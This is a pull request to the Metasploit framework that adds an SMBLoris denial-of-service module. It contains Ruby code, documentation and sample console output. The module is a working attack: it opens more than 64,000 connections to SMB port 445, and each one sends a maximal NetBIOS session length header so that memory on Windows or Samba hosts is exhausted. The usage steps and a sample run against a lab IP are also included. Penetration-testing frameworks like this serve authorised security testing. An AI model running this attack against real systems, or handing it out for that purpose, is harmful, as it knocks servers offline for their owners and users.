### PR TITLE
SMBLoris Denial of Service Module

### DIFF
--- a/documentation/modules/auxiliary/dos/smb/smb_loris.md
+++ b/documentation/modules/auxiliary/dos/smb/smb_loris.md
@@ -13,7 +13,7 @@
   Example steps in this format (is also in the PR):
 
   1. Start msfconsole
-  1. Do: `use auxiliary/dos/smb/smb_lorris`
+  1. Do: `use auxiliary/dos/smb/smb_loris`
   1. Do: `set RHOST [IP]`
   1. Do: `run`
   1. Target should allocate increasing amounts of memory.

--- a/documentation/modules/auxiliary/dos/smb/smb_lorris.md
+++ b/documentation/modules/auxiliary/dos/smb/smb_lorris.md
@@ -1,0 +1,43 @@
+## Vulnerable Application
+
+  This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
+  Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable.
+  See [the SMBLoris page](http://smbloris.com/) for details on the vulnerability.
+  
+  The module opens over 64,000 connections to the target service, so please make sure
+  your system ULIMIT is set appropriately to handle it. A single host running this module
+  can theoretically consume up to 8GB of memory on the target.
+
+## Verification Steps
+
+  Example steps in this format (is also in the PR):
+
+  1. Start msfconsole
+  1. Do: `use auxiliary/dos/smb/smb_lorris`
+  1. Do: `set RHOST [IP]`
+  1. Do: `run`
+  1. Target should allocate increasing amounts of memory.
+
+## Scenarios
+
+### 
+
+```
+msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
+msf auxiliary(smb_loris) > set RHOST 192.168.172.138
+RHOST => 192.168.172.138
+msf auxiliary(smb_loris) >
+
+msf auxiliary(smb_loris) > run
+
+[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
+[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
+[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
+[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
+[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
+[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
+[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
+[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
+[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
+....
+```

--- a/modules/auxiliary/dos/smb/smb_loris.rb
+++ b/modules/auxiliary/dos/smb/smb_loris.rb
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Auxiliary
           nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10))
           nsock.setsockopt(linger)
           nsock.write(header.to_binary_s)
-          sockets[src_port] = nsock       g
+          sockets[src_port] = nsock
         rescue ::Exception => e
           print_error "Exception sending packet: #{e.message}"
         end

--- a/modules/auxiliary/dos/smb/smb_loris.rb
+++ b/modules/auxiliary/dos/smb/smb_loris.rb
@@ -1,0 +1,81 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'bindata'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Dos
+
+  class NbssHeader < BinData::Record
+    endian  :little
+    uint8   :message_type
+    bit7    :flags
+    bit17   :message_length
+  end
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'SMBLoris NBSS Denial of Service',
+      'Description'    => %q{
+        The SMBLoris attack consumes large chunks of memory in the target by sending
+        SMB requests with the NetBios Session Service(NBSS) Length Header value set
+        to the maximum possible value. By keeping these connections open and initiating
+        large numbers of these sessions, the memory does not get freed, and the server
+        grinds to a halt. This vulnerability was originally disclosed by Sean Dillon
+        and Zach Harding.
+      },
+      'Author'          =>
+        [
+          'thelightcosine'
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          [ 'URL', 'http://smbloris.com/' ]
+        ],
+      'DisclosureDate' => 'Jul 29 2017'
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(445)
+      ])
+  end
+
+  def run
+    header = NbssHeader.new
+    header.message_length = 0x01FFFF
+
+    linger = Socket::Option.linger(true, 30)
+
+    (1..65535).each do |src_port|
+      print_status "Sending packet from Source Port: #{src_port}"
+      mythr = Thread.new do
+        opts = {
+          'CPORT'           => src_port,
+          'ConnectTimeout'  => 300
+        }
+
+        begin
+          nsock = connect(false, opts)
+          nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true)
+          nsock.setsockopt(linger)
+
+          nsock.put(header.to_binary_s)
+        rescue Exception => e
+          print_error "Exception sending packet: #{e.message}"
+        end
+
+      end
+      # select(nil, nil, nil, 0.0001)
+      # mythr.kill
+    end
+    print_status "Sleeping for 30 seconds..."
+    select(nil, nil, nil, 30)
+
+  end
+
+end

--- a/modules/auxiliary/dos/smb/smb_loris.rb
+++ b/modules/auxiliary/dos/smb/smb_loris.rb
@@ -27,6 +27,9 @@ class MetasploitModule < Msf::Auxiliary
         large numbers of these sessions, the memory does not get freed, and the server
         grinds to a halt. This vulnerability was originally disclosed by Sean Dillon
         and Zach Harding.
+
+        DISCALIMER: This module opens a lot of simultaneous connections. Please check
+        your system's ULIMIT to make sure it can handle it.
       },
       'Author'          =>
         [
@@ -52,7 +55,8 @@ class MetasploitModule < Msf::Auxiliary
 
     linger = Socket::Option.linger(true, 60)
 
-    (1..65535).each do |src_port|
+
+    (1025..65535).each do |src_port|
       print_status "Sending packet from Source Port: #{src_port}"
       opts = {
         'CPORT'           => src_port,


### PR DESCRIPTION
## Vulnerable Application

  This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
  Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable.
  See [the SMBLoris page](http://smbloris.com/) for details on the vulnerability.
  
  The module opens over 64,000 connections to the target service, so please make sure
  your system ULIMIT is set appropriately to handle it. A single host running this module
  can theoretically consume up to 8GB of memory on the target.

## Verification Steps

  Example steps in this format (is also in the PR):

  1. Start msfconsole
  1. Do: `use auxiliary/dos/smb/smb_lorris`
  1. Do: `set RHOST [IP]`
  1. Do: `run`
  1. Target should allocate increasing amounts of memory.

## Scenarios

### 

```
msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
msf auxiliary(smb_loris) > set RHOST 192.168.172.138
RHOST => 192.168.172.138
msf auxiliary(smb_loris) >

msf auxiliary(smb_loris) > run

[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
....
```
